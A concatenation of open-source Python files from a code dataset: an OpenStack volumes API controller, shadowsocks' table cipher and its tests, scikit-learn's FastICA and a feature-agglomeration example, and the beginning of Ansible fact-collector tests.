Handles standard volume attributes as well as the optional metadata
attribute
"""
metadata_deserializer = common.MetadataXMLDeserializer()
def _extract_volume(self, node):
"""Marshal the volume attribute of a parsed request."""
volume = {}
volume_node = self.find_first_child_named(node, 'volume')
attributes = ['display_name', 'display_description', 'size',
'volume_type', 'availability_zone']
for attr in attributes:
if volume_node.getAttribute(attr):
volume[attr] = volume_node.getAttribute(attr)
metadata_node = self.find_first_child_named(volume_node, 'metadata')
if metadata_node is not None:
volume['metadata'] = self.extract_metadata(metadata_node)
return volume
class CreateDeserializer(CommonDeserializer):
"""Deserializer to handle xml-formatted create volume requests.
Handles standard volume attributes as well as the optional metadata
attribute
"""
def default(self, string):
"""Deserialize an xml-formatted volume create request."""
dom = minidom.parseString(string)
volume = self._extract_volume(dom)
return {'body': {'volume': volume}}
class VolumeController(wsgi.Controller):
"""The Volumes API controller for the OpenStack API."""
def __init__(self, ext_mgr):
self.volume_api = volume.API()
self.ext_mgr = ext_mgr
super(VolumeController, self).__init__()
@wsgi.serializers(xml=VolumeTemplate)
def show(self, req, id):
"""Return data about the given volume."""
context = req.environ['nova.context']
try:
vol = self.volume_api.get(context, id)
except exception.NotFound:
raise exc.HTTPNotFound()
return {'volume': _translate_volume_detail_view(context, vol)}
def delete(self, req, id):
"""Delete a volume."""
context = req.environ['nova.context']
LOG.audit(_("Delete volume with id: %s"), id, context=context)
try:
volume = self.volume_api.get(context, id)
self.volume_api.delete(context, volume)
except exception.NotFound:
raise exc.HTTPNotFound()
return webob.Response(status_int=202)
@wsgi.serializers(xml=VolumesTemplate)
def index(self, req):
"""Returns a summary list of volumes."""
return self._items(req, entity_maker=_translate_volume_summary_view)
@wsgi.serializers(xml=VolumesTemplate)
def detail(self, req):
"""Returns a detailed list of volumes."""
return self._items(req, entity_maker=_translate_volume_detail_view)
def _items(self, req, entity_maker):
"""Returns a list of volumes, transformed through entity_maker."""
search_opts = {}
search_opts.update(req.GET)
context = req.environ['nova.context']
remove_invalid_options(context,
search_opts, self._get_volume_search_options())
volumes = self.volume_api.get_all(context, search_opts=search_opts)
limited_list = common.limited(volumes, req)
res = [entity_maker(context, vol) for vol in limited_list]
return {'volumes': res}
def _image_uuid_from_href(self, image_href):
# If the image href was generated by nova api, strip image_href
# down to an id.
try:
image_uuid = image_href.split('/').pop()
except (TypeError, AttributeError):
msg = _("Invalid imageRef provided.")
raise exc.HTTPBadRequest(explanation=msg)
if not utils.is_uuid_like(image_uuid):
msg = _("Invalid imageRef provided.")
raise exc.HTTPBadRequest(explanation=msg)
return image_uuid
@wsgi.serializers(xml=VolumeTemplate)
@wsgi.deserializers(xml=CreateDeserializer)
def create(self, req, body):
"""Creates a new volume."""
if not self.is_valid_body(body, 'volume'):
raise exc.HTTPUnprocessableEntity()
context = req.environ['nova.context']
volume = body['volume']
kwargs = {}
req_volume_type = volume.get('volume_type', None)
if req_volume_type:
try:
kwargs['volume_type'] = volume_types.get_volume_type_by_name(
context, req_volume_type)
except exception.NotFound:
raise exc.HTTPNotFound()
kwargs['metadata'] = volume.get('metadata', None)
snapshot_id = volume.get('snapshot_id')
if snapshot_id is not None:
kwargs['snapshot'] = self.volume_api.get_snapshot(context,
snapshot_id)
else:
kwargs['snapshot'] = None
size = volume.get('size', None)
if size is None and kwargs['snapshot'] is not None:
size = kwargs['snapshot']['volume_size']
LOG.audit(_("Create volume of %s GB"), size, context=context)
image_href = None
image_uuid = None
if self.ext_mgr.is_loaded('os-image-create'):
image_href = volume.get('imageRef')
if snapshot_id and image_href:
msg = _("Snapshot and image cannot be specified together.")
raise exc.HTTPBadRequest(explanation=msg)
if image_href:
image_uuid = self._image_uuid_from_href(image_href)
kwargs['image_id'] = image_uuid
kwargs['availability_zone'] = volume.get('availability_zone', None)
new_volume = self.volume_api.create(context,
size,
volume.get('display_name'),
volume.get('display_description'),
**kwargs)
# TODO(vish): Instance should be None at db layer instead of
# trying to lazy load, but for now we turn it into
# a dict to avoid an error.
retval = _translate_volume_detail_view(context, dict(new_volume),
image_uuid)
result = {'volume': retval}
location = '%s/%s' % (req.url, new_volume['id'])
return wsgi.ResponseObject(result, headers=dict(location=location))
def _get_volume_search_options(self):
"""Return volume search options allowed by non-admin."""
return ('name', 'status')
def create_resource(ext_mgr):
return wsgi.Resource(VolumeController(ext_mgr))
def remove_invalid_options(context, search_options, allowed_search_options):
"""Remove search options that are not valid for non-admin API/context."""
if context.is_admin:
# Allow all options
return
# Otherwise, strip out all unknown options
unknown_options = [opt for opt in search_options
if opt not in allowed_search_options]
bad_options = ", ".join(unknown_options)
log_msg = _("Removing options '%(bad_options)s' from query") % locals()
LOG.debug(log_msg)
for opt in unknown_options:
search_options.pop(opt, None)
|
Ivicel/shadowsocks
|
refs/heads/master
|
shadowsocks/crypto/table.py
|
1044
|
# !/usr/bin/env python
#
# Copyright 2015 clowwindy
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import, division, print_function, \
with_statement
import string
import struct
import hashlib
__all__ = ['ciphers']
cached_tables = {}
if hasattr(string, 'maketrans'):
maketrans = string.maketrans
translate = string.translate
else:
maketrans = bytes.maketrans
translate = bytes.translate
def get_table(key):
m = hashlib.md5()
m.update(key)
s = m.digest()
a, b = struct.unpack('<QQ', s)
table = maketrans(b'', b'')
table = [table[i: i + 1] for i in range(len(table))]
for i in range(1, 1024):
table.sort(key=lambda x: int(a % (ord(x) + i)))
return table
def init_table(key):
if key not in cached_tables:
encrypt_table = b''.join(get_table(key))
decrypt_table = maketrans(encrypt_table, maketrans(b'', b''))
cached_tables[key] = [encrypt_table, decrypt_table]
return cached_tables[key]
class TableCipher(object):
def __init__(self, cipher_name, key, iv, op):
self._encrypt_table, self._decrypt_table = init_table(key)
self._op = op
def update(self, data):
if self._op:
return translate(data, self._encrypt_table)
else:
return translate(data, self._decrypt_table)
ciphers = {
'table': (0, 0, TableCipher)
}
def test_table_result():
from shadowsocks.common import ord
target1 = [
[60, 53, 84, 138, 217, 94, 88, 23, 39, 242, 219, 35, 12, 157, 165, 181,
255, 143, 83, 247, 162, 16, 31, 209, 190, 171, 115, 65, 38, 41, 21,
245, 236, 46, 121, 62, 166, 233, 44, 154, 153, 145, 230, 49, 128, 216,
173, 29, 241, 119, 64, 229, 194, 103, 131, 110, 26, 197, 218, 59, 204,
56, 27, 34, 141, 221, 149, 239, 192, 195, 24, 155, 170, 183, 11, 254,
213, 37, 137, 226, 75, 203, 55, 19, 72, 248, 22, 129, 33, 175, 178,
10, 198, 71, 77, 36, 113, 167, 48, 2, 117, 140, 142, 66, 199, 232,
243, 32, 123, 54, 51, 82, 57, 177, 87, 251, 150, 196, 133, 5, 253,
130, 8, 184, 14, 152, 231, 3, 186, 159, 76, 89, 228, 205, 156, 96,
163, 146, 18, 91, 132, 85, 80, 109, 172, 176, 105, 13, 50, 235, 127,
0, 189, 95, 98, 136, 250, 200, 108, 179, 211, 214, 106, 168, 78, 79,
74, 210, 30, 73, 201, 151, 208, 114, 101, 174, 92, 52, 120, 240, 15,
169, 220, 182, 81, 224, 43, 185, 40, 99, 180, 17, 212, 158, 42, 90, 9,
191, 45, 6, 25, 4, 222, 67, 126, 1, 116, 124, 206, 69, 61, 7, 68, 97,
202, 63, 244, 20, 28, 58, 93, 134, 104, 144, 227, 147, 102, 118, 135,
148, 47, 238, 86, 112, 122, 70, 107, 215, 100, 139, 223, 225, 164,
237, 111, 125, 207, 160, 187, 246, 234, 161, 188, 193, 249, 252],
[151, 205, 99, 127, 201, 119, 199, 211, 122, 196, 91, 74, 12, 147, 124,
180, 21, 191, 138, 83, 217, 30, 86, 7, 70, 200, 56, 62, 218, 47, 168,
22, 107, 88, 63, 11, 95, 77, 28, 8, 188, 29, 194, 186, 38, 198, 33,
230, 98, 43, 148, 110, 177, 1, 109, 82, 61, 112, 219, 59, 0, 210, 35,
215, 50, 27, 103, 203, 212, 209, 235, 93, 84, 169, 166, 80, 130, 94,
164, 165, 142, 184, 111, 18, 2, 141, 232, 114, 6, 131, 195, 139, 176,
220, 5, 153, 135, 213, 154, 189, 238, 174, 226, 53, 222, 146, 162,
236, 158, 143, 55, 244, 233, 96, 173, 26, 206, 100, 227, 49, 178, 34,
234, 108, 207, 245, 204, 150, 44, 87, 121, 54, 140, 118, 221, 228,
155, 78, 3, 239, 101, 64, 102, 17, 223, 41, 137, 225, 229, 66, 116,
171, 125, 40, 39, 71, 134, 13, 193, 129, 247, 251, 20, 136, 242, 14,
36, 97, 163, 181, 72, 25, 144, 46, 175, 89, 145, 113, 90, 159, 190,
15, 183, 73, 123, 187, 128, 248, 252, 152, 24, 197, 68, 253, 52, 69,
117, 57, 92, 104, 157, 170, 214, 81, 60, 133, 208, 246, 172, 23, 167,
160, 192, 76, 161, 237, 45, 4, 58, 10, 182, 65, 202, 240, 185, 241,
79, 224, 132, 51, 42, 126, 105, 37, 250, 149, 32, 243, 231, 67, 179,
48, 9, 106, 216, 31, 249, 19, 85, 254, 156, 115, 255, 120, 75, 16]]
target2 = [
[124, 30, 170, 247, 27, 127, 224, 59, 13, 22, 196, 76, 72, 154, 32,
209, 4, 2, 131, 62, 101, 51, 230, 9, 166, 11, 99, 80, 208, 112, 36,
248, 81, 102, 130, 88, 218, 38, 168, 15, 241, 228, 167, 117, 158, 41,
10, 180, 194, 50, 204, 243, 246, 251, 29, 198, 219, 210, 195, 21, 54,
91, 203, 221, 70, 57, 183, 17, 147, 49, 133, 65, 77, 55, 202, 122,
162, 169, 188, 200, 190, 125, 63, 244, 96, 31, 107, 106, 74, 143, 116,
148, 78, 46, 1, 137, 150, 110, 181, 56, 95, 139, 58, 3, 231, 66, 165,
142, 242, 43, 192, 157, 89, 175, 109, 220, 128, 0, 178, 42, 255, 20,
214, 185, 83, 160, 253, 7, 23, 92, 111, 153, 26, 226, 33, 176, 144,
18, 216, 212, 28, 151, 71, 206, 222, 182, 8, 174, 205, 201, 152, 240,
155, 108, 223, 104, 239, 98, 164, 211, 184, 34, 193, 14, 114, 187, 40,
254, 12, 67, 93, 217, 6, 94, 16, 19, 82, 86, 245, 24, 197, 134, 132,
138, 229, 121, 5, 235, 238, 85, 47, 103, 113, 179, 69, 250, 45, 135,
156, 25, 61, 75, 44, 146, 189, 84, 207, 172, 119, 53, 123, 186, 120,
171, 68, 227, 145, 136, 100, 90, 48, 79, 159, 149, 39, 213, 236, 126,
52, 60, 225, 199, 105, 73, 233, 252, 118, 215, 35, 115, 64, 37, 97,
129, 161, 177, 87, 237, 141, 173, 191, 163, 140, 234, 232, 249],
[117, 94, 17, 103, 16, 186, 172, 127, 146, 23, 46, 25, 168, 8, 163, 39,
174, 67, 137, 175, 121, 59, 9, 128, 179, 199, 132, 4, 140, 54, 1, 85,
14, 134, 161, 238, 30, 241, 37, 224, 166, 45, 119, 109, 202, 196, 93,
190, 220, 69, 49, 21, 228, 209, 60, 73, 99, 65, 102, 7, 229, 200, 19,
82, 240, 71, 105, 169, 214, 194, 64, 142, 12, 233, 88, 201, 11, 72,
92, 221, 27, 32, 176, 124, 205, 189, 177, 246, 35, 112, 219, 61, 129,
170, 173, 100, 84, 242, 157, 26, 218, 20, 33, 191, 155, 232, 87, 86,
153, 114, 97, 130, 29, 192, 164, 239, 90, 43, 236, 208, 212, 185, 75,
210, 0, 81, 227, 5, 116, 243, 34, 18, 182, 70, 181, 197, 217, 95, 183,
101, 252, 248, 107, 89, 136, 216, 203, 68, 91, 223, 96, 141, 150, 131,
13, 152, 198, 111, 44, 222, 125, 244, 76, 251, 158, 106, 24, 42, 38,
77, 2, 213, 207, 249, 147, 113, 135, 245, 118, 193, 47, 98, 145, 66,
160, 123, 211, 165, 78, 204, 80, 250, 110, 162, 48, 58, 10, 180, 55,
231, 79, 149, 74, 62, 50, 148, 143, 206, 28, 15, 57, 159, 139, 225,
122, 237, 138, 171, 36, 56, 115, 63, 144, 154, 6, 230, 133, 215, 41,
184, 22, 104, 254, 234, 253, 187, 226, 247, 188, 156, 151, 40, 108,
51, 83, 178, 52, 3, 31, 255, 195, 53, 235, 126, 167, 120]]
encrypt_table = b''.join(get_table(b'foobar!'))
decrypt_table = maketrans(encrypt_table, maketrans(b'', b''))
for i in range(0, 256):
assert (target1[0][i] == ord(encrypt_table[i]))
assert (target1[1][i] == ord(decrypt_table[i]))
encrypt_table = b''.join(get_table(b'barfoo!'))
decrypt_table = maketrans(encrypt_table, maketrans(b'', b''))
for i in range(0, 256):
assert (target2[0][i] == ord(encrypt_table[i]))
assert (target2[1][i] == ord(decrypt_table[i]))
def test_encryption():
from shadowsocks.crypto import util
cipher = TableCipher('table', b'test', b'', 1)
decipher = TableCipher('table', b'test', b'', 0)
util.run_cipher(cipher, decipher)
if __name__ == '__main__':
test_table_result()
test_encryption()
|
marcocaccin/scikit-learn
|
refs/heads/master
|
sklearn/decomposition/fastica_.py
|
54
|
"""
Python implementation of the fast ICA algorithms.
Reference: Tables 8.3 and 8.4 page 196 in the book:
Independent Component Analysis, by Hyvarinen et al.
"""
# Authors: Pierre Lafaye de Micheaux, Stefan van der Walt, Gael Varoquaux,
# Bertrand Thirion, Alexandre Gramfort, Denis A. Engemann
# License: BSD 3 clause
import warnings
import numpy as np
from scipy import linalg
from ..base import BaseEstimator, TransformerMixin
from ..externals import six
from ..externals.six import moves
from ..utils import check_array, as_float_array, check_random_state
from ..utils.extmath import fast_dot
from ..utils.validation import check_is_fitted
from ..utils.validation import FLOAT_DTYPES
__all__ = ['fastica', 'FastICA']
def _gs_decorrelation(w, W, j):
"""
Orthonormalize w wrt the first j rows of W
Parameters
----------
w : ndarray of shape(n)
Array to be orthogonalized
W : ndarray of shape(p, n)
Null space definition
j : int < p
The no of (from the first) rows of Null space W wrt which w is
orthogonalized.
Notes
-----
Assumes that W is orthogonal
w changed in place
"""
w -= np.dot(np.dot(w, W[:j].T), W[:j])
return w
def _sym_decorrelation(W):
""" Symmetric decorrelation
i.e. W <- (W * W.T) ^{-1/2} * W
"""
s, u = linalg.eigh(np.dot(W, W.T))
# u (resp. s) contains the eigenvectors (resp. square roots of
# the eigenvalues) of W * W.T
return np.dot(np.dot(u * (1. / np.sqrt(s)), u.T), W)
def _ica_def(X, tol, g, fun_args, max_iter, w_init):
"""Deflationary FastICA using fun approx to neg-entropy function
Used internally by FastICA.
"""
n_components = w_init.shape[0]
W = np.zeros((n_components, n_components), dtype=X.dtype)
n_iter = []
# j is the index of the extracted component
for j in range(n_components):
w = w_init[j, :].copy()
w /= np.sqrt((w ** 2).sum())
for i in moves.xrange(max_iter):
gwtx, g_wtx = g(fast_dot(w.T, X), fun_args)
w1 = (X * gwtx).mean(axis=1) - g_wtx.mean() * w
_gs_decorrelation(w1, W, j)
w1 /= np.sqrt((w1 ** 2).sum())
lim = np.abs(np.abs((w1 * w).sum()) - 1)
w = w1
if lim < tol:
break
n_iter.append(i + 1)
W[j, :] = w
return W, max(n_iter)
def _ica_par(X, tol, g, fun_args, max_iter, w_init):
"""Parallel FastICA.
Used internally by FastICA --main loop
"""
W = _sym_decorrelation(w_init)
del w_init
p_ = float(X.shape[1])
for ii in moves.xrange(max_iter):
gwtx, g_wtx = g(fast_dot(W, X), fun_args)
W1 = _sym_decorrelation(fast_dot(gwtx, X.T) / p_
- g_wtx[:, np.newaxis] * W)
del gwtx, g_wtx
# builtin max, abs are faster than numpy counter parts.
lim = max(abs(abs(np.diag(fast_dot(W1, W.T))) - 1))
W = W1
if lim < tol:
break
else:
warnings.warn('FastICA did not converge. Consider increasing '
'tolerance or the maximum number of iterations.')
return W, ii + 1
# Some standard non-linear functions.
# XXX: these should be optimized, as they can be a bottleneck.
def _logcosh(x, fun_args=None):
alpha = fun_args.get('alpha', 1.0) # comment it out?
x *= alpha
gx = np.tanh(x, x) # apply the tanh inplace
g_x = np.empty(x.shape[0])
# XXX compute in chunks to avoid extra allocation
for i, gx_i in enumerate(gx): # please don't vectorize.
g_x[i] = (alpha * (1 - gx_i ** 2)).mean()
return gx, g_x
def _exp(x, fun_args):
exp = np.exp(-(x ** 2) / 2)
gx = x * exp
g_x = (1 - x ** 2) * exp
return gx, g_x.mean(axis=-1)
def _cube(x, fun_args):
return x ** 3, (3 * x ** 2).mean(axis=-1)
def fastica(X, n_components=None, algorithm="parallel", whiten=True,
fun="logcosh", fun_args=None, max_iter=200, tol=1e-04, w_init=None,
random_state=None, return_X_mean=False, compute_sources=True,
return_n_iter=False):
"""Perform Fast Independent Component Analysis.
Read more in the :ref:`User Guide <ICA>`.
Parameters
----------
X : array-like, shape (n_samples, n_features)
Training vector, where n_samples is the number of samples and
n_features is the number of features.
n_components : int, optional
Number of components to extract. If None no dimension reduction
is performed.
algorithm : {'parallel', 'deflation'}, optional
Apply a parallel or deflational FASTICA algorithm.
whiten : boolean, optional
If True perform an initial whitening of the data.
If False, the data is assumed to have already been
preprocessed: it should be centered, normed and white.
Otherwise you will get incorrect results.
In this case the parameter n_components will be ignored.
fun : string or function, optional. Default: 'logcosh'
The functional form of the G function used in the
approximation to neg-entropy. Could be either 'logcosh', 'exp',
or 'cube'.
You can also provide your own function. It should return a tuple
containing the value of the function, and of its derivative, in the
point. Example:
def my_g(x):
return x ** 3, 3 * x ** 2
fun_args : dictionary, optional
Arguments to send to the functional form.
If empty or None and if fun='logcosh', fun_args will take value
{'alpha' : 1.0}
max_iter : int, optional
Maximum number of iterations to perform.
tol: float, optional
A positive scalar giving the tolerance at which the
un-mixing matrix is considered to have converged.
w_init : (n_components, n_components) array, optional
Initial un-mixing array of dimension (n.comp,n.comp).
If None (default) then an array of normal r.v.'s is used.
random_state : int or RandomState
Pseudo number generator state used for random sampling.
return_X_mean : bool, optional
If True, X_mean is returned too.
compute_sources : bool, optional
If False, sources are not computed, but only the rotation matrix.
This can save memory when working with big data. Defaults to True.
return_n_iter : bool, optional
Whether or not to return the number of iterations.
Returns
-------
K : array, shape (n_components, n_features) | None.
If whiten is 'True', K is the pre-whitening matrix that projects data
onto the first n_components principal components. If whiten is 'False',
K is 'None'.
W : array, shape (n_components, n_components)
Estimated un-mixing matrix.
The mixing matrix can be obtained by::
w = np.dot(W, K.T)
A = w.T * (w * w.T).I
S : array, shape (n_samples, n_components) | None
Estimated source matrix
X_mean : array, shape (n_features, )
The mean over features. Returned only if return_X_mean is True.
n_iter : int
If the algorithm is "deflation", n_iter is the
maximum number of iterations run across all components. Else
they are just the number of iterations taken to converge. This is
returned only when return_n_iter is set to `True`.
Notes
-----
The data matrix X is considered to be a linear combination of
non-Gaussian (independent) components i.e. X = AS where columns of S
contain the independent components and A is a linear mixing
matrix. In short ICA attempts to `un-mix' the data by estimating an
un-mixing matrix W where ``S = W K X.``
This implementation was originally made for data of shape
[n_features, n_samples]. Now the input is transposed
before the algorithm is applied. This makes it slightly
faster for Fortran-ordered input.
Implemented using FastICA:
`A. Hyvarinen and E. Oja, Independent Component Analysis:
Algorithms and Applications, Neural Networks, 13(4-5), 2000,
pp. 411-430`
"""
random_state = check_random_state(random_state)
fun_args = {} if fun_args is None else fun_args
# make interface compatible with other decompositions
# a copy is required only for non whitened data
X = check_array(X, copy=whiten, dtype=FLOAT_DTYPES).T
alpha = fun_args.get('alpha', 1.0)
if not 1 <= alpha <= 2:
raise ValueError('alpha must be in [1,2]')
if fun == 'logcosh':
g = _logcosh
elif fun == 'exp':
g = _exp
elif fun == 'cube':
g = _cube
elif callable(fun):
def g(x, fun_args):
return fun(x, **fun_args)
else:
exc = ValueError if isinstance(fun, six.string_types) else TypeError
raise exc("Unknown function %r;"
" should be one of 'logcosh', 'exp', 'cube' or callable"
% fun)
n, p = X.shape
if not whiten and n_components is not None:
n_components = None
warnings.warn('Ignoring n_components with whiten=False.')
if n_components is None:
n_components = min(n, p)
if (n_components > min(n, p)):
n_components = min(n, p)
print("n_components is too large: it will be set to %s" % n_components)
if whiten:
# Centering the columns (ie the variables)
X_mean = X.mean(axis=-1)
X -= X_mean[:, np.newaxis]
# Whitening and preprocessing by PCA
u, d, _ = linalg.svd(X, full_matrices=False)
del _
K = (u / d).T[:n_components] # see (6.33) p.140
del u, d
X1 = np.dot(K, X)
# see (13.6) p.267 Here X1 is white and data
# in X has been projected onto a subspace by PCA
X1 *= np.sqrt(p)
else:
# X must be casted to floats to avoid typing issues with numpy
# 2.0 and the line below
X1 = as_float_array(X, copy=False) # copy has been taken care of
if w_init is None:
w_init = np.asarray(random_state.normal(size=(n_components,
n_components)), dtype=X1.dtype)
else:
w_init = np.asarray(w_init)
if w_init.shape != (n_components, n_components):
raise ValueError('w_init has invalid shape -- should be %(shape)s'
% {'shape': (n_components, n_components)})
kwargs = {'tol': tol,
'g': g,
'fun_args': fun_args,
'max_iter': max_iter,
'w_init': w_init}
if algorithm == 'parallel':
W, n_iter = _ica_par(X1, **kwargs)
elif algorithm == 'deflation':
W, n_iter = _ica_def(X1, **kwargs)
else:
raise ValueError('Invalid algorithm: must be either `parallel` or'
' `deflation`.')
del X1
if whiten:
if compute_sources:
S = fast_dot(fast_dot(W, K), X).T
else:
S = None
if return_X_mean:
if return_n_iter:
return K, W, S, X_mean, n_iter
else:
return K, W, S, X_mean
else:
if return_n_iter:
return K, W, S, n_iter
else:
return K, W, S
else:
if compute_sources:
S = fast_dot(W, X).T
else:
S = None
if return_X_mean:
if return_n_iter:
return None, W, S, None, n_iter
else:
return None, W, S, None
else:
if return_n_iter:
return None, W, S, n_iter
else:
return None, W, S
class FastICA(BaseEstimator, TransformerMixin):
"""FastICA: a fast algorithm for Independent Component Analysis.
Read more in the :ref:`User Guide <ICA>`.
Parameters
----------
n_components : int, optional
Number of components to use. If none is passed, all are used.
algorithm : {'parallel', 'deflation'}
Apply parallel or deflational algorithm for FastICA.
whiten : boolean, optional
If whiten is false, the data is already considered to be
whitened, and no whitening is performed.
fun : string or function, optional. Default: 'logcosh'
The functional form of the G function used in the
approximation to neg-entropy. Could be either 'logcosh', 'exp',
or 'cube'.
You can also provide your own function. It should return a tuple
containing the value of the function, and of its derivative, in the
point. Example:
def my_g(x):
return x ** 3, 3 * x ** 2
fun_args : dictionary, optional
Arguments to send to the functional form.
If empty and if fun='logcosh', fun_args will take value
{'alpha' : 1.0}.
max_iter : int, optional
Maximum number of iterations during fit.
tol : float, optional
Tolerance on update at each iteration.
w_init : None of an (n_components, n_components) ndarray
The mixing matrix to be used to initialize the algorithm.
random_state : int or RandomState
Pseudo number generator state used for random sampling.
Attributes
----------
components_ : 2D array, shape (n_components, n_features)
The unmixing matrix.
mixing_ : array, shape (n_features, n_components)
The mixing matrix.
n_iter_ : int
If the algorithm is "deflation", n_iter is the
maximum number of iterations run across all components. Else
they are just the number of iterations taken to converge.
Notes
-----
Implementation based on
`A. Hyvarinen and E. Oja, Independent Component Analysis:
Algorithms and Applications, Neural Networks, 13(4-5), 2000,
pp. 411-430`
"""
def __init__(self, n_components=None, algorithm='parallel', whiten=True,
fun='logcosh', fun_args=None, max_iter=200, tol=1e-4,
w_init=None, random_state=None):
super(FastICA, self).__init__()
self.n_components = n_components
self.algorithm = algorithm
self.whiten = whiten
self.fun = fun
self.fun_args = fun_args
self.max_iter = max_iter
self.tol = tol
self.w_init = w_init
self.random_state = random_state
def _fit(self, X, compute_sources=False):
"""Fit the model
Parameters
----------
X : array-like, shape (n_samples, n_features)
Training data, where n_samples is the number of samples
and n_features is the number of features.
compute_sources : bool
If False, sources are not computes but only the rotation matrix.
This can save memory when working with big data. Defaults to False.
Returns
-------
X_new : array-like, shape (n_samples, n_components)
"""
fun_args = {} if self.fun_args is None else self.fun_args
whitening, unmixing, sources, X_mean, self.n_iter_ = fastica(
X=X, n_components=self.n_components, algorithm=self.algorithm,
whiten=self.whiten, fun=self.fun, fun_args=fun_args,
max_iter=self.max_iter, tol=self.tol, w_init=self.w_init,
random_state=self.random_state, return_X_mean=True,
compute_sources=compute_sources, return_n_iter=True)
if self.whiten:
self.components_ = np.dot(unmixing, whitening)
self.mean_ = X_mean
self.whitening_ = whitening
else:
self.components_ = unmixing
self.mixing_ = linalg.pinv(self.components_)
if compute_sources:
self.__sources = sources
return sources
def fit_transform(self, X, y=None):
"""Fit the model and recover the sources from X.
Parameters
----------
X : array-like, shape (n_samples, n_features)
Training data, where n_samples is the number of samples
and n_features is the number of features.
Returns
-------
X_new : array-like, shape (n_samples, n_components)
"""
return self._fit(X, compute_sources=True)
def fit(self, X, y=None):
"""Fit the model to X.
Parameters
----------
X : array-like, shape (n_samples, n_features)
Training data, where n_samples is the number of samples
and n_features is the number of features.
Returns
-------
self
"""
self._fit(X, compute_sources=False)
return self
def transform(self, X, y=None, copy=True):
"""Recover the sources from X (apply the unmixing matrix).
Parameters
----------
X : array-like, shape (n_samples, n_features)
Data to transform, where n_samples is the number of samples
and n_features is the number of features.
copy : bool (optional)
If False, data passed to fit are overwritten. Defaults to True.
Returns
-------
X_new : array-like, shape (n_samples, n_components)
"""
check_is_fitted(self, 'mixing_')
X = check_array(X, copy=copy, dtype=FLOAT_DTYPES)
if self.whiten:
X -= self.mean_
return fast_dot(X, self.components_.T)
def inverse_transform(self, X, copy=True):
"""Transform the sources back to the mixed data (apply mixing matrix).
Parameters
----------
X : array-like, shape (n_samples, n_components)
Sources, where n_samples is the number of samples
and n_components is the number of components.
copy : bool (optional)
If False, data passed to fit are overwritten. Defaults to True.
Returns
-------
X_new : array-like, shape (n_samples, n_features)
"""
check_is_fitted(self, 'mixing_')
X = check_array(X, copy=(copy and self.whiten), dtype=FLOAT_DTYPES)
X = fast_dot(X, self.mixing_.T)
if self.whiten:
X += self.mean_
return X
|
rexshihaoren/scikit-learn
|
refs/heads/master
|
examples/cluster/plot_digits_agglomeration.py
|
377
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
=========================================================
Feature agglomeration
=========================================================
These images how similar features are merged together using
feature agglomeration.
"""
print(__doc__)
# Code source: Gaël Varoquaux
# Modified for documentation by Jaques Grobler
# License: BSD 3 clause
import numpy as np
import matplotlib.pyplot as plt
from sklearn import datasets, cluster
from sklearn.feature_extraction.image import grid_to_graph
digits = datasets.load_digits()
images = digits.images
X = np.reshape(images, (len(images), -1))
connectivity = grid_to_graph(*images[0].shape)
agglo = cluster.FeatureAgglomeration(connectivity=connectivity,
n_clusters=32)
agglo.fit(X)
X_reduced = agglo.transform(X)
X_restored = agglo.inverse_transform(X_reduced)
images_restored = np.reshape(X_restored, images.shape)
plt.figure(1, figsize=(4, 3.5))
plt.clf()
plt.subplots_adjust(left=.01, right=.99, bottom=.01, top=.91)
for i in range(4):
plt.subplot(3, 4, i + 1)
plt.imshow(images[i], cmap=plt.cm.gray, vmax=16, interpolation='nearest')
plt.xticks(())
plt.yticks(())
if i == 1:
plt.title('Original data')
plt.subplot(3, 4, 4 + i + 1)
plt.imshow(images_restored[i], cmap=plt.cm.gray, vmax=16,
interpolation='nearest')
if i == 1:
plt.title('Agglomerated data')
plt.xticks(())
plt.yticks(())
plt.subplot(3, 4, 10)
plt.imshow(np.reshape(agglo.labels_, images[0].shape),
interpolation='nearest', cmap=plt.cm.spectral)
plt.xticks(())
plt.yticks(())
plt.title('Labels')
plt.show()
|
Tatsh-ansible/ansible
|
refs/heads/devel
|
test/units/module_utils/facts/test_collectors.py
|
39
|
# unit tests for ansible fact collectors
# -*- coding: utf-8 -*-
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
# Make coding more python3-ish
from __future__ import (absolute_import, division)
__metaclass__ = type
from ansible.compat.tests.mock import Mock, patch
from . base import BaseFactsTest
from ansible.module_utils.facts import collector
from ansible.module_utils.facts.system.apparmor import ApparmorFactCollector
from ansible.module_utils.facts.system.caps import SystemCapabilitiesFactCollector
from ansible.module_utils.facts.system.cmdline import CmdLineFactCollector
from ansible.module_utils.facts.system.distribution import DistributionFactCollector
from ansible.module_utils.facts.system.dns import DnsFactCollector
from ansible.module_utils.facts.system.env import EnvFactCollector
from ansible.module_utils.facts.system.fips import FipsFactCollector
from ansible.module_utils.facts.system.pkg_mgr import PkgMgrFactCollector
from ansible.module_utils.facts.system.platform import PlatformFactCollector
from ansible.module_utils.facts.system.python import PythonFactCollector
from ansible.module_utils.facts.system.selinux import SelinuxFactCollector
from ansible.module_utils.facts.system.service_mgr import ServiceMgrFactCollector
from ansible.module_utils.facts.system.ssh_pub_keys import SshPubKeyFactCollector
from ansible.module_utils.facts.system.user import UserFactCollector
from ansible.module_utils.facts.virtual.base import VirtualCollector
from ansible.module_utils.facts.network.base import NetworkCollector
from ansible.module_utils.facts.hardware.base import HardwareCollector
class CollectorException(Exception):
pass
class ExceptionThrowingCollector(collector.BaseFactCollector):
name = 'exc_throwing'
def __init__(self, collectors=None, namespace=None, exception=None):
super(ExceptionThrowingCollector, self).__init__(collectors, namespace)
self._exception = exception or CollectorException('collection failed')
def collect(self, module=None, collected_facts=None):
raise self._exception
class TestExceptionThrowingCollector(BaseFactsTest):
__test__ = True
gather_subset = ['exc_throwing']
valid_subsets = ['exc_throwing']
collector_class = ExceptionThrowingCollector
def test_collect(self):
module = self._mock_module()
